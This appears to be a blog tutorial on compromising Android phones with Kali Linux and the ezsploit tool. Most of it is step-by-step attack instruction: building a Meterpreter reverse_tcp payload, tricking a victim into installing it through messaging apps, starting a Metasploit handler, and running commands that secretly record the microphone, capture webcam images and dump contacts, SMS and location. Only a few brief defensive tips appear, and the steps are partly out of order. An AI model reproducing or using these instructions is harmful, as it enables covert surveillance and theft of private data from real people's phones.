Hack mobile phone using Kali linux and Ezsploit

ezsploit

Hack mobile phone using Kali linux and Ezsploit

Hello, guys today we will see, hack mobile phone using Kali Linux and Ezsploit….preety simple steps …firstly you have to install Kali Linux os on your machine then just follow the steps given below.

 

 

How to install Ezsploit in Kali Linux

 

First of all, we need to open our Kali Linux terminal and enter this command “cd desktop”for going to your desktop because in the desktop you need to install ezploit tool.

 

 

Now we need to download ezsploit tool by executing this command in terminal window of Kali Linux -/Desktop# git clone https://github.com/rand0m1ze/ezsploit.git

        • Always check the permission of each and every application that are installed in your As some of the application might be accessing your phone more than it required for functioning.Do not download any application from untrusted source. Because some of the attacker combined the payload with some of the famous application.Always have some antivirus software installed on your devices. 
          • Now after this a new folder is created on your desktop which is named as Ezsploit.

           

          so we have won half the battle …..the only thing which we have to do ..is waiting for the when the victim download our apk file on his android phone….thus we can  hack mobile phone using Kali Linux and Ezsploit

          How to Run ezsploit

           

          • Now downloading of the ezsploit tool will start and after that, you can see a ezsploit file in your desktop, so you need to wait for downloading it completely.And Now again go to the terminal window of Kali Linux and execute this command cd ezsploit.

           

           

           

          • again execute this command ls, and we will now be able to see two files.
            sh, readme.md

           

           

           

           

          • Now to install this tool in Kali Linux, to install this tool first we have to give chmod permission. Type the command for this chmod +x ezsploit.sh and press enter button.

           

           

           

          • Now we can run this tool easily, that give this command ./ezsploit.sh  and press enter button.

           

           

          • Now a screen will come having many options like payload, listen, exploit, persistence and many more option you will see there. Now here for creating a payload type 1.

           

           

           

           

           

           

           

           

           

           

           

          • Now here we need to first choose the os for which we are going to create a payload. In our case here is the demonstration for android devices. Now assume that you we are going to create the payload for android device then execute the associated number like 4 (Android is on fourth position among the rest option).

           

           

           

           

          • Note : Here I am using Local Network for this, so I have local ip, if you are using on the public network then put your static ip.

           

           

          • After that it will ask for Set LHOST  IP ,simply here if you want to use your payload remotely then you’ll need to enter your static ip here and press enter. For checking your ip simply execute this command in your terminal ifconfig  and then Now enter the Set LPORT  4444 and then press enter button.

          • You will see that the payload for Android has been created, you will find it in the Temp folder on the desktop.

           

           

          • Exploit any android device using Ezsploit

          We have create payload for Android now we need to send this payload to your victim phone by using any social engineering techniques, for example, Email, WhatsApp , Facebook etc. And when your victim double click on it then your payload is ready for sending the data to victim’s machine.

           

           

          • Now you open the tool again, and  give this command ./ezsploit.sh and press enter button.

           

          • Now press 3 to start to exploit ,  the execute the associated number like 3
            (Exploit is on the third position among the rest option).

           

          • You will now see that the Metasploit has been open in the terminal window.

           

          • Now write the following command and after writing each command hit enter.

           

          Command:
          msf  > use multi/handler  (press enter button)

          msf exploit(handler) > set payload android/meterpreter/reverse_tcp

          msf exploit(handler) > set LHOST 192.168.44.128

          msf exploit(handler) > set LPORT 4444

          msf exploit(handler) > run

           

           

          Now after that try the following Command
          Command:
          -sysinfo

          This command is used to get the information of that cell phone like which version of android is     running on this device.

          – record_mic

          This command will open the voice recorder and record the voice of the victim device and ssave  that voice file to our system.

          – webcam_snap

          This command will take the picture from the victim phone without out open the camera and save that image to the attacker machine.

          – webcam_stream

          This command will start the video recording from the victim phone without out open the camera and save that image to the attacker machine.

          – dump_contacts

          This command is used to copy the contacts which are stored in victim phone and save that in a   file at the attacker system.

          – dump_sms

          This command works same as the dump_contacts but in the place of coping the contacts, it    will copy all the SMS.

           

           

          – geolocate

               This command will share the victim cell phone location to the attacker.

           

          So these are some simple steps to Hack mobile phone using Kali Linux and Ezsploit.

          • Suggestions for dealing with such type of attacks

          As we know there is no absolute security in this world but always a small precaution might be better than cure. Here we will discuss how can we prevent the attacker from gaining access to our devices.

          • Do not click on the suspicious link even if it was sent by your known person as that link can redirect you to the downloading page of that payload.

           

Leave a Reply

Your email address will not be published.